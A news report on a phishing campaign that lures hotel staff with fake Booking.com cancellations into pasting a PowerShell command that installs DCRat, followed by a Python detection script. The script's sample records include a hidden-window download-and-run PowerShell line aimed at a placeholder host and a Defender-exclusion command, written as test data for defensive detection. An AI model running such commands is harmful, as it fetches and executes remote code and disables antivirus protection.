European hotels are currently dealing with an active phishing campaign that is specifically designed to exploit trust in Booking.com cancellation notifications. The campaign targets hotel staff and property operators by sending emails that appear to be legitimate booking cancellation messages. These emails are crafted to look authentic and closely resemble routine communications that hotels receive daily, increasing the likelihood that recipients will open them and follow the embedded instructions without suspicion.
According to security researchers, the attack chain begins when the recipient clicks a link within the fraudulent cancellation email. This action redirects the victim to a fake website that mimics a system error environment. Upon loading, users are shown a counterfeit blue screen message that claims a critical system issue has occurred and immediate action is required. The page instructs victims to run a PowerShell command presented as a fix to resolve the supposed error. Because hotel environments often rely on shared systems and front desk machines with frequent user interaction, attackers are able to take advantage of urgency and confusion, prompting staff to follow the instructions without verifying their legitimacy.
Once the PowerShell command is executed, the infection process begins. The malicious script installs DCRat, a remote access trojan that allows attackers to gain persistent control over the compromised system. The malware is deployed through MSBuild.exe, a legitimate Microsoft utility that is often abused by threat actors to evade detection. By leveraging a trusted system binary, the attackers reduce the chances of triggering immediate security alerts. During the installation process, the malware also modifies Microsoft Defender settings by adding exclusions, effectively weakening the system's built-in protection and allowing the threat to operate with reduced interference. This step ensures that the malware remains active on the system for extended periods and can survive reboots, making remediation more complex for affected organizations.
The presence of DCRat on infected machines gives attackers a broad range of capabilities. These include monitoring user activity, capturing credentials, executing additional commands, and potentially spreading laterally across connected systems. For hotels, this poses serious risks, as compromised endpoints may provide access to reservation systems, customer data, internal communications, and payment-related information. The campaign highlights how threat actors continue to refine social engineering techniques by blending technical deception with realistic business scenarios. By abusing a well-known travel platform and common operational workflows, the attackers are able to bypass traditional skepticism and exploit human behavior as the weakest link in cybersecurity defenses. Security teams are urging hospitality organizations to remain alert to unexpected cancellation emails, reinforce user awareness, and restrict the execution of unauthorized scripts to reduce exposure to similar attacks.
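The chain described in the two paragraphs above (a PowerShell command pasted from a fake error page, a payload run through MSBuild.exe, and Microsoft Defender exclusions being added) maps directly onto three process-creation detections a hotel's security team could run over endpoint telemetry. The following Python script is an added example, not code from the article or from any researcher or vendor it mentions: it applies those heuristics to constructed process-creation records whose fields mirror Sysmon Event ID 1 or Windows Security 4688 (parent image, image, command line). The sample paths, user name and URL are constructed, and the lists of lure parents and user-writable directories are assumptions to be tuned for the estate.

```python
"""Detection heuristics for the paste-and-run chain described above, run over
constructed process-creation records (fields mirror Sysmon Event ID 1 /
Security 4688: parent image, image, command line)."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


POWERSHELL = {"powershell.exe", "pwsh.exe"}
SCRIPT_HOSTS = POWERSHELL | {"cmd.exe", "wscript.exe", "mshta.exe"}
# Assumption: parents from which a PowerShell launch with hidden/download flags is
# almost never legitimate on a front-desk PC: the Explorer shell (Win+R paste) and browsers.
LURE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}

# Assumption: user-writable staging directories; extend with the estate's own paths.
USER_WRITABLE = re.compile(
    r"\\(appdata|temp|tmp|programdata|public|downloads)\\", re.IGNORECASE)
# Hidden window, encoded command, or in-memory download-and-run idioms.
PS_LURE_FLAGS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s+[a-z0-9+/=]{20,}"
    r"|downloadstring|invoke-webrequest|\biwr\b|net\.webclient|\biex\b|invoke-expression)",
    re.IGNORECASE)
# Defender exclusion added via the Add-MpPreference cmdlet or written straight into the registry key.
DEFENDER_EXCLUSION = re.compile(
    r"(add-mppreference\s+.*-exclusion|windows defender\\exclusions)", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or forward-slash) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(ev: ProcessEvent) -> list[tuple[str, str]]:
    """Return (stage, reason) findings for one event; an empty list means nothing matched."""
    img, parent, cl = basename(ev.image), basename(ev.parent_image), ev.command_line
    findings = []
    if DEFENDER_EXCLUSION.search(cl):
        findings.append(("defender-tamper", f"{img} adds a Microsoft Defender exclusion"))
    if img in POWERSHELL and parent in LURE_PARENTS and PS_LURE_FLAGS.search(cl):
        findings.append(("lure-exec", f"{img} launched by {parent} with hidden/download flags"))
    if img == "msbuild.exe" and (parent in SCRIPT_HOSTS or USER_WRITABLE.search(cl)):
        findings.append(("msbuild-proxy", f"msbuild.exe launched by {parent} outside a developer workflow"))
    return findings


def triage(events):
    """Return (set of stages seen, per-event hits). All three stages on one host is the full chain."""
    hits = [(ev, f) for ev in events for f in detect(ev)]
    return {stage for _, (stage, _) in hits}, hits


# Constructed sample records, not captured from a real incident.
SAMPLE_EVENTS = [
    # Routine activity that must not alert.
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -NoProfile -Command Get-Date"),
    ProcessEvent(r"C:\Program Files\Microsoft Visual Studio\devenv.exe",
                 r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
                 r"MSBuild.exe C:\dev\app\app.csproj"),
    # Stage 1: the command pasted from the fake error page (Win+R, so Explorer is the parent).
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell.exe -w hidden -nop -c "iex (iwr https://example.invalid/fix.txt)"'),
    # Stage 2: payload run through the trusted MSBuild binary from a temp directory.
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
                 r"MSBuild.exe C:\Users\frontdesk\AppData\Local\Temp\update.xml"),
    # Stage 3: Defender exclusion for the staging directory.
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'powershell.exe -c "Add-MpPreference -ExclusionPath C:\Users\frontdesk\AppData\Local\Temp"'),
]

if __name__ == "__main__":
    stages, hits = triage(SAMPLE_EVENTS)
    for ev, (stage, reason) in hits:
        print(f"[{stage}] {reason}\n    {ev.command_line}")
    print("stages observed:", sorted(stages))
```

Each stage is scored on its own so a single hit (for example, MSBuild.exe spawned by PowerShell) is worth an analyst's look, while all three on the same host within a short window is the full chain and should page someone. The Defender check has an independent corroborating source: the Microsoft-Windows-Windows Defender/Operational log records Event ID 5007 whenever the platform configuration changes, including new exclusions, so that event can be correlated with the command-line match. The "restrict the execution of unauthorized scripts" advice above complements this: with PowerShell constrained for front-desk accounts, the stage 1 command fails outright and the detection becomes a second line rather than the first.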